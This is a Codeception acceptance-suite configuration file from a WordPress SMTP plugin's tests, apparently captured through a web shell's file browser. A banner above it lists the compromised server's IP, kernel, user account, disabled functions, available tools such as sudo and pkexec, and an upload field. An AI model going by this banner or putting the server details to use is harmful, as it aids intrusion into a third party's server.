| Server IP : 103.48.194.25 / Your IP : 216.73.216.74 Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64 User : sieuthimay ( 1016) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/maysayhoaqua.com.vn-bk/public_html/wp-content/plugins/wp-smtp/tests/ |
Upload File : |
# Codeception Test Suite Configuration
#
# Suite for acceptance tests.
# Perform tests in browser using the WPWebDriver or WPBrowser.
# Use WPDb to set up your initial database fixture.
# If you need both WPWebDriver and WPBrowser tests - create a separate suite.
actor: AcceptanceTester
modules:
enabled:
- WPDb
- WPLoader
- WPWebDriver
- \Helper\Acceptance
config:
WPDb:
dsn: 'mysql:host=%WP_DB_HOST%;dbname=%WP_DB_NAME%'
user: '%WP_DB_USER%'
password: '%WP_DB_PASSWORD%'
dump: tests/_data/dump.sql
populate: true
cleanup: true
url: '%WP_URL%'
tablePrefix: '%WP_TABLE_PREFIX%'
WPLoader:
# just load WordPress using the same db as WPDb
loadOnly: true
wpRootFolder: '%WP_ROOT_FOLDER%'
dbName: '%WP_DB_NAME%'
dbHost: '%WP_DB_HOST%'
dbUser: '%WP_DB_USER%'
dbPassword: '%WP_DB_PASSWORD%'
constants:
SCRIPT_DEBUG: true
WPWebDriver:
url: '%WP_CHROMEDRIVER_URL%'
adminUsername: '%WP_ADMIN_USERNAME%'
adminPassword: '%WP_ADMIN_PASSWORD%'
adminUrl: /wp-admin
browser: chrome
host: '%CHROMEDRIVER_HOST%'
port: '%CHROMEDRIVER_PORT%'
wait: 10
window_size: 1920,1080
log_js_errors: true
capabilities:
'goog:chromeOptions':
args:
- '--headless'
- '--disable-gpu'
- '--disable-dev-shm-usage'
- "--proxy-server='direct://'"
- '--proxy-bypass-list=*'
- '--no-sandbox'